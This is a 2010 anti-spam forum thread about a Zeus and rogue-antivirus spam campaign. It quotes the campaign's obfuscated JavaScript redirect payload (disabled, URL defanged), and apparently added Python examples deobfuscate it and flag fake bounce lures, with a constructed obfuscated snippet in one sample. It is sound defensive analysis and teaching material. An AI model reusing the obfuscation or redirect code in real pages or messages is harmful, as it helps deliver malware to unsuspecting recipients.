
Zeus delivery campaign


All times are UTC - 5 hours [ DST ]


 [ 9 posts ] 
Author Message
 PostPosted: Fri Jun 18, 2010 1:19 pm   
Getting started

Joined: Thu Jun 17, 2010 5:37 pm
Posts: 18
This post quotes malicious javascript, but the code has been disabled by being enclosed in "[code]" brackets. - Alpha


My apologies if this has already been discussed. Is anyone else seeing spam that delivers an .html attachment with obfuscated javascript in it? Something like:

Code:
<**Neutered for AV**script type='text/javascript'>
function j(){};
var uE=false;
j.prototype = {
  v : function() {
    var l='';
    this.lU=false;
    this.a='';
    var r=document;
    f="";
    var rI=new Date();
    var s=14705;
    // padding characters stripped at runtime: decodes to 'location', so y = document.location
    var y=r['l$o$cWaptWi$o$nd'.replace(/[dW\<p\$]/g, '')];
    k='';
    this.vT='';
    var x=new Array();
    // property decodes to 'href'; the value decodes to the redirect target, hxxp://mabcom[.]net/z.htm (defanged)
    y['har%eafp'.replace(/[p%~Aa]/g, '')]='hututrp*:u/r/^m*a)b*cuorm).un)e)t^/*zu.uh*tum)'.replace(/[\)r\^\*u]/g, '');
    var lC=new Array();
    var e=new Array();
    this.sJ="";
    var i=false;
  }
};
var uH=function(){return 'uH'};
var u=new j();
var o=function(){};
u.v();   // the only call that does anything: sets document.location.href
sQ="sQ";
<**Neutered for AV**/script>


If you break it up, you find the malicious URL is hxxp://mabcom[dot]net. This URL then contains a redirect to a final spam site, typically pillz or replica watches, but it also contains a hidden iframe linking to a site that, in this case, contained RogueAV and Zeus.

The reason I ask is that the messages are rapidly changing, and throwing up way more javascript garbage to wade through for the redirect url. This morning alone I've seen 9 different subject lines.

And a final note to the lengthy (sorry!) post, a number of these redirect sites have been hosted with HostRocket.com. Has anyone had issues with them in the past? They have been responsive with takedown requests, but I find it odd they continue to be a problem.


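The "break it up" step hellkyng describes can be done statically, without ever executing the attachment. The Python below is an added example (my own code, not from the original post): it finds every `'padded literal'.replace(/[junk chars]/g, '')` call in the script, drops the listed characters the way the JavaScript engine would, substitutes the plain strings back into the source and pulls out the URL that only exists after decoding. The `SAMPLE` string is a copy of the neutered script quoted above; the character-class handling also accepts escaped characters and `a-z` style ranges, which generalizes beyond this particular sample. Function names are my own.

```python
import re
from typing import List

# Constructed copy of the neutered sample quoted in the first post
# (the "**Neutered for AV**" markers are kept exactly as posted).
SAMPLE = r"""<**Neutered for AV**script type='text/javascript'>function j(){};var uE=false;j.prototype = {v : function() {var l='';this.lU=false;this.a='';var r=document;f="";var rI=new Date();var s=14705;var y=r['l$o$cWaptWi$o$nd'.replace(/[dW\<p\$]/g, '')];k='';this.vT='';var x=new Array();y['har%eafp'.replace(/[p%~Aa]/g, '')]='hututrp*:u/r/^m*a)b*cuorm).un)e)t^/*zu.uh*tum)'.replace(/[\)r\^\*u]/g, '');var lC=new Array();var e=new Array();this.sJ="";var i=false;}};var uH=function(){return 'uH'};var u=new j(); var o=function(){};u.v();sQ="sQ";<**Neutered for AV**/script>"""

# Matches  'junk-padded literal'.replace(/[characters to drop]/g, '')
STRIP_CALL = re.compile(
    r"'((?:[^'\\]|\\.)*)'"                            # group 1: the padded literal
    r"\.replace\(/\[((?:[^\]\\]|\\.)*)\]/g,\s*''\)"    # group 2: character-class body
)


def class_chars(body: str) -> set:
    """Expand a regex character-class body (e.g. dW\\<p\\$ or a-z0-9) into the characters it matches."""
    chars = set()
    i = 0
    while i < len(body):
        c = body[i]
        if c == "\\" and i + 1 < len(body):       # escaped character such as \) or \$
            c = body[i + 1]
            i += 2
        else:
            i += 1
        if i + 1 < len(body) and body[i] == "-":   # range such as a-z
            hi = body[i + 1]
            if hi == "\\" and i + 2 < len(body):
                hi = body[i + 2]
                i += 3
            else:
                i += 2
            chars.update(chr(x) for x in range(ord(c), ord(hi) + 1))
        else:
            chars.add(c)
    return chars


def strip_chars(literal: str, class_body: str) -> str:
    """Evaluate .replace(/[class]/g, '') statically: drop every character the class matches."""
    literal = re.sub(r"\\(.)", r"\1", literal)      # undo JS backslash escapes inside the literal
    drop = class_chars(class_body)
    return "".join(ch for ch in literal if ch not in drop)


def decode_strings(js: str) -> List[str]:
    """Every padded literal in the script, in source order, with its padding removed."""
    return [strip_chars(lit, cls) for lit, cls in STRIP_CALL.findall(js)]


def deobfuscate(js: str) -> str:
    """The script with each strip call replaced by the plain string it evaluates to."""
    return STRIP_CALL.sub(lambda m: "'" + strip_chars(m.group(1), m.group(2)) + "'", js)


URL = re.compile(r"https?://[^\s'\"<>]+")


def extract_urls(js: str) -> List[str]:
    """Redirect targets that only become visible once the padding is gone."""
    return URL.findall(deobfuscate(js))


def defang(url: str) -> str:
    """hxxp://host[.]tld form, so the indicator can be pasted without being clickable."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + ("/" + path if path else "")


if __name__ == "__main__":
    for s in decode_strings(SAMPLE):
        print("decoded literal:", s)
    for u in extract_urls(SAMPLE):
        print("redirect target:", defang(u))
```

Run against the sample, the three decoded literals are `location`, `href` and the redirect target, i.e. the script is just `document.location.href = <URL>`. Because nothing is executed, the same script works as a gateway-side extractor for the attachment: any URL that appears only after decoding is the indicator to block.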
 PostPosted: Fri Jun 18, 2010 3:37 pm   
You are kiillllling-a my bizinisss!

Joined: Thu Mar 01, 2007 3:01 am
Posts: 5915
Avira AntiVir doesn't like your post! :shock:

But it's pretty sensitive and will alarm if it sees javascript that's just too sneaky-looking, even if it's disabled. I added code brackets to be sure it's dead.

I don't recall problems with HostRocket. Is it a lot of issues in a short interval, or consistent occurrences over a long time period?

They are inexpensive, offer unlimited bandwidth, and allow an unlimited number of domain names on the same hosting package, so those features might be attractive to spammers with a lot of throwaway domains. Spammers often use stolen credit cards to pay anyway, but if the monthly fee is low, it's less likely to be noticed on the victim's bill or questioned by the hosting company at the time of signup.

It's also difficult to do aggressive enforcement on that kind of budget -- HostRocket may mean well, but may have resigned themselves to doing no more than responding to complaints, without doing any further investigation of the customers causing the complaints.


 PostPosted: Fri Jun 18, 2010 4:00 pm   
Getting started

Joined: Thu Jun 17, 2010 5:37 pm
Posts: 18
Sorry about that, nothing like a quick test of the AV I suppose.

I'm just noticing issues with HostRocket, and I've seen a few posts around various sites that indicate there have been issues before. I think you might be right, though: they have a nice set of services that make them easily abused. But to their credit, after a 30-minute wait on hold they did get the malicious content removed from a site in a matter of minutes.

I may give them a call and see if I can chat with someone above tier 1 regarding this spam campaign. I hate to see them abused, especially given this spam is doing a decent job of evading filters, at least our filters anyway.


 PostPosted: Fri Jun 18, 2010 4:47 pm   
You are kiillllling-a my bizinisss!

Joined: Thu Mar 01, 2007 3:01 am
Posts: 5915
hellkyng wrote:
I may give them a call and see if I can chat with someone above tier 1 regarding this spam campaign.


It's worth a try. It's good to remember that most of us have learned a huge amount about the spammer economy since we started reporting, and abuse desk people simply don't know as much about it as we do. Most people are blown away when they find out how blatantly illegal a lot of these slick-looking websites are. Administrators can go from apathetic to on-the-warpath pretty quickly when they realize they've been played for fools.


 PostPosted: Fri Jun 18, 2010 5:14 pm   
You are kiillllling-a my bizinisss!

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
Analyzing: the corrupted domain and its name servers are long-standing, so it was likely infiltrated.

WHOIS look-ups
1.
Domain Name: MABCOM.NET
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.HRNOC.NET
Name Server: DNS2.HRNOC.NET
Status: ok
Updated Date: 19-jan-2010
Creation Date: 21-jan-2004
..
2.
Name server
Domain Name: HRNOC.NET
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.HRNOC.NET
Name Server: DNS2.HRNOC.NET
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 16-feb-2007
Creation Date: 12-nov-2001
..
Technical Contact:
HostRocket.Com
HostRocket Customer ([email protected])
+1.5183713421
Fax:
21 Corporate Drive
Clifton Park, NY 12065
US

Web site mabcom.net is in Dutch, google translated as
Quote:
This website IS STILL under construction and will take some more time than expected,
We will do our best to complete it as soon as possible!

MABCOM.NET is just opened!

What we do include

* Hardware Repair of computers including PC, Mac, Laptops
* Software-based Repair using such programs as virus removal, driver installation
* Repairs on Game consoles such as PSP, Wii, DS, Xbox 360, PS3 etc etc
* Modification - Photos Games computers (such as region free time)
* Purchasing, selling computers, game consoles and accessories

Don't hesitate to visit our shop (store to store) located in topgames - Jan van Galenstraat 60 1056CC Amsterdam

open Monday through Friday from 10:30 a.m. to 6:00 p.m. and Saturday from 10:30 a.m. to 5:00 p.m.

For a route description hXXp://www.TOPGAMES.NL

Alternatively, your mail for more info on: [email protected]



Mvg

Michael Buys

MABCOM


 PostPosted: Tue Jul 06, 2010 2:55 pm   
Getting started

Joined: Thu Jun 17, 2010 5:37 pm
Posts: 18
Despite the ridiculous nature of these javascript obfuscation messages, I wanted to post a follow-up to this, as a couple of people have mentioned having issues with these specific fraud/malware spam messages. For whatever reason, commercial spam filtering vendors are not detecting these messages very well. An example that made it through today:

Quote:
Subject: Delivery Status Notification (Failure)

Note: Forwarded message is attached. This is an automatically generated Delivery Status Notification. Delivery to the following recipients failed. [email protected] Final-Recipient: rfc822;[email protected] Action: failed Status: 5.1.1


This tripped up a number of users who clicked the html attachment to see "what they sent", which naturally contains a mixture of javascript garbage and a redirection to some bad sites.

For anyone else getting tripped up by this, the URLs used in the spam are fairly obvious; I'm happy to share what info I have as the campaign changes. We've taken the approach of simply blocking the URLs as we identify them, as they typically seem to use only 1-3 different URLs a week. Thanks for the info so far on this all; hopefully this helps others a bit as well.


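The lure quoted above copies the wording of a bounce, not its construction, and that is something a gateway can check independently of the ever-changing URLs. The Python below is an added example (my own code, not the poster's filter and not any vendor's): it quarantines a message that claims in its subject to be a delivery status notification but is not built the way a real DSN is (RFC 3464: `multipart/report; report-type=delivery-status` with a `message/delivery-status` part, and, per RFC 5321, sent with the null return path `<>`), and it flags any .html attachment on such a message, especially one carrying script or `replace(/[...]/g, '')` padding. Both sample messages are constructed; the addresses, hostnames and the obfuscated snippet in the lure are placeholders, not indicators from the campaign.

```python
import re
from email import policy
from email.parser import BytesParser
from typing import Dict, List

# Constructed lure in the shape quoted above: bounce wording, but an ordinary multipart/mixed
# message with a non-null return path and an .html attachment carrying script.
LURE = b"""Return-Path: <bounce-7@throwaway-host.example>
From: Mail Delivery Subsystem <mailer-daemon@throwaway-host.example>
To: victim@corp.example
Subject: Delivery Status Notification (Failure)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="lure"

--lure
Content-Type: text/plain

Note: Forwarded message is attached. Delivery to the following recipients failed.
Final-Recipient: rfc822;someone@corp.example Action: failed Status: 5.1.1

--lure
Content-Type: text/html; name="message.html"
Content-Disposition: attachment; filename="message.html"

<html><body><script type='text/javascript'>
var y=document['lo~ca~ti~on'.replace(/[~]/g, '')];
y['h#re#f'.replace(/[#]/g, '')]='http://redirect.example/z.htm';
</script></body></html>

--lure--
"""

# Constructed real bounce: multipart/report with a message/delivery-status part (RFC 3464),
# sent with the null reverse-path (RFC 5321).
REAL_DSN = b"""Return-Path: <>
From: Mail Delivery System <MAILER-DAEMON@mx.corp.example>
To: sender@corp.example
Subject: Delivery Status Notification (Failure)
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status; boundary="dsn"

--dsn
Content-Type: text/plain

Delivery to the following recipient failed permanently: nobody@corp.example

--dsn
Content-Type: message/delivery-status

Reporting-MTA: dns; mx.corp.example

Final-Recipient: rfc822; nobody@corp.example
Action: failed
Status: 5.1.1

--dsn--
"""

DSN_WORDING = re.compile(
    r"delivery status notification|undeliverable|mail delivery fail|returned mail|delivery failure", re.I)
SCRIPT_MARKERS = re.compile(r"<script|\.replace\(/\[|String\.fromCharCode|unescape\(|eval\(", re.I)


def classify_bounce(raw: bytes) -> Dict[str, object]:
    """Quarantine a message that talks like a bounce but is not built like one."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    if not DSN_WORDING.search(str(msg.get("Subject", ""))):
        return {"verdict": "pass", "reasons": []}   # not claiming to be a bounce; other filters apply
    reasons: List[str] = []

    # 1. A real DSN is multipart/report; report-type=delivery-status with a message/delivery-status part.
    is_report = (msg.get_content_type() == "multipart/report"
                 and str(msg.get_param("report-type", "")).lower() == "delivery-status")
    has_status = any(p.get_content_type() == "message/delivery-status" for p in msg.walk())
    if not (is_report and has_status):
        reasons.append("bounce wording without multipart/report + message/delivery-status structure")

    # 2. Bounces are sent with the null reverse-path, so Return-Path should be <>.
    rp = str(msg.get("Return-Path", "")).strip()
    if rp and rp != "<>":
        reasons.append("non-null Return-Path %s on a bounce" % rp)

    # 3. No bounce needs an .html attachment; one carrying script is the campaign's payload.
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        is_html = part.get_content_type() == "text/html" or name.endswith((".htm", ".html"))
        if part.get_content_disposition() == "attachment" and is_html:
            body = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
            if SCRIPT_MARKERS.search(body):
                reasons.append("html attachment %s contains script/obfuscation markers" % (name or "(unnamed)"))
            else:
                reasons.append("html attachment %s on a bounce" % (name or "(unnamed)"))

    return {"verdict": "quarantine" if reasons else "pass", "reasons": reasons}


if __name__ == "__main__":
    for label, raw in (("lure", LURE), ("real DSN", REAL_DSN)):
        print(label, classify_bounce(raw))
```

The structural checks are the durable part: the subject lines and URLs rotate weekly, as the thread notes, but a fake bounce cannot carry a genuine `message/delivery-status` part from your own MTA, and a real one has no reason to ship an .html attachment at all. Treat the first two reasons as quarantine-worthy on their own and the attachment scan as the confirmation.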
 PostPosted: Sat Jul 24, 2010 8:19 am   
Spammers' Nightmare

Joined: Thu Apr 05, 2007 4:10 pm
Posts: 2777
This one has been recently spamming crap out of my accounts. :roll:
On a related note: someone recently updated their blog to say the obvious. :evil:

Zbot/Zeus botnets aren’t going away
http://www.thesecurityblog.com/2010/07/zbotzeus-botnets-aren’t-going-away/


 PostPosted: Sat Jul 24, 2010 8:43 am   
Spammers' Nightmare

Joined: Thu Apr 05, 2007 4:10 pm
Posts: 2777
Also interesting to note: in July 2010, researchers at Trend Micro published a 21-page PDF analysis of Zeus (also note its other malware names: ZBOT, WSNPoem, PRG, JabberZeuS, etc.) titled ZeuS: A Persistent Cybercrime Enterprise.

It mentions that ZeuS is targeting Russian banks. Also worth mentioning: credit is given to the ZeuSTracker, which actively posts infected domains, IPs, ASNs, etc.


 PostPosted: Sat Jul 24, 2010 6:37 pm   
Spammer Obliterator

Joined: Fri Jun 15, 2007 7:05 pm
Posts: 2261
meep wrote:
It mentions that ZeuS is targeting Russian banks.

Well, if that won't create some hassle in Russian law enforcement circles, then I don't know what will. But if it takes some Duma members losing their savings or some FSB officer having his credit card number stolen before they start taking cybercrime seriously, so be it. :sad3:

_________________
Arf, she said


